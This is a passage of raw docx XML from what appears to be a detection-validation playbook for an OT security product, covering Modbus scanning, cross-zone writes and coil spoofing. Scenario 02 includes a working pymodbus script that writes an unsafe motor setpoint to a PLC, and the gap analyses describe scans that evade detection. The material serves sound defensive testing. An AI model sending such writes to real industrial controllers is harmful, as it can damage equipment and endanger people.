        </w:rPr>
        <w:t>Reveals which PLC the attacker has line-of-sight to, and from which workstation, informing the containment plan (block the source IP at the L2/L3 firewall).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Differentiates a real scan from a misconfigured polling app by clustering exceptions in a tight burst — operators can sanity-check by asking 'did anyone reconfigure the historian today?'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OTShield catches the *burst*. It does not yet catch a slow, low-and-slow scan that stays below the burst threshold:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Stealth scan (1 probe / 30s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sub-threshold rate evades the burst rule. Capability needed: sliding-window rate baseline per (src, dst, fc) with a 24h window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Distributed scan from multiple sources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — attacker spreads probes across two compromised hosts, each below threshold. Capability needed: dst-side aggregation (burst-by-destination, not by conduit).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Targeted scan (only known-good offsets)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — produces no exceptions at all. Capability needed: read-pattern fingerprint vs. learned baseline of legitimate polling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 02  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Cross-zone unauthorized write (IT → PLC)</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T0855 — Unauthorized Command Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modbus TCP (FC 0x06, 0x10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inhibit Response Function / Impair Process Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A host in an enterprise zone (Purdue L3 or higher) issues a Modbus Write Single Register (FC 0x06) or Write Multiple Registers (FC 0x10) targeting a PLC in L1. Normal operations confine writes to engineering workstations operating from a designated jump host inside the DMZ — any other source is by definition unauthorized. This is the canonical 'IT pivot to OT' moment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Use `pymodbus` to push a setpoint from the L3 host to the L1 PLC. The single FC 0x06 PDU is enough; no need to flood.</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scenario02_unauthorized_write.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>from pymodbus.client import ModbusTcpClient</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PLC = '10.10.2.20'        # L1 — basic control</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SETPOINT_REG = 40001      # holding register: motor RPM setpoint</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MALICIOUS_VAL = 9999      # well above safe operating envelope</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># NOTE: bind() to the L3 source IP if multi-homed</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>with ModbusTcpClient(PLC, port=502, source_address=('10.20.0.50', 0)) as c:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    rsp = c.write_register(address=SETPOINT_REG, value=MALICIOUS_VAL, slave=1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    assert not rsp.isError(), rsp</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    print('write OK -&gt; setpoint =', MALICIOUS_VAL)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Capture the resulting traffic on the lab span port:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#   sudo tcpdump -i eth1 -w scenario02_unauthorized_write.pcap host 10.10.2.20</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify in the OTShield asset inventory that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.20.0.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>purdueLevel = LEVEL_3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.2.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LEVEL_1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> *before* uploading — the rule short-circuits if either level is unknown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">For a louder demo, repeat the write loop 5×; the rule still emits one anomaly (deduped on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>rule|src→dst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.unauthorized_write</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UnauthorizedWriteRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Write PDU where source Purdue level &gt; destination Purdue level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CRITICAL when src ≥ L3 → dst ≤ L1, or Δlevel ≥ 2; else HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0855 — Unauthorized Command Message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the embedded topology shows a thick red edge L3 → L1 immediately after pcap upload (≤ 5s). The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIVE DATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> banner increments the anomaly counter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anomalies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the new row appears at the top, sorted by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>detectedAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Severity badge is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Unauthorized cross-zone write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Click the row → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab → confirm function code = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0x06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, target register = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>40001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload value = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>9999</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Acknowledge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> → status flips to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ACKNOWLEDGED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, audit log records the analyst.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A write that crosses Purdue zones is one of the highest-confidence indicators in the entire ICS detection canon — the consequences map directly to physical state:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Process safety</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a register write to a setpoint can drive a pump, valve or motor outside its mechanical envelope. Lab demo: motor over-spin → bearing failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Safety instrumented system bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if the SIS is on the same Modbus map, the attacker can disable trip points before the dangerous setpoint takes effect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Forensic clarity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — because the write is a discrete PDU with a clear src→dst, incident response can revert by sending the original setpoint and confirm via the next read cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Rule fires reliably *only when* both endpoints are in the asset inventory with known Purdue levels. Real-world gaps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Unknown source IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — attacker pivots through a host OTShield has never seen. Capability needed: classify unknown sources by subnet → infer Purdue level (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.20.0.0/24 → L3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Same-zone lateral write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — attacker compromises an HMI in L2 and writes to an L2 peer. No level violation, no alert. Capability needed: per-asset write-source allowlist (which clients are *expected* to write to this PLC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Function code 0x16 (Mask Write)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — currently classified as a write but with no specific evidence parsing. Capability needed: dissector enrichment for FC 0x16 and FC 0x17 (Read/Write Multiple).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 03  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Coil-spoof to falsify safety state</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T0832 — Manipulation of View</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modbus TCP (FC 0x05, 0x0F)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
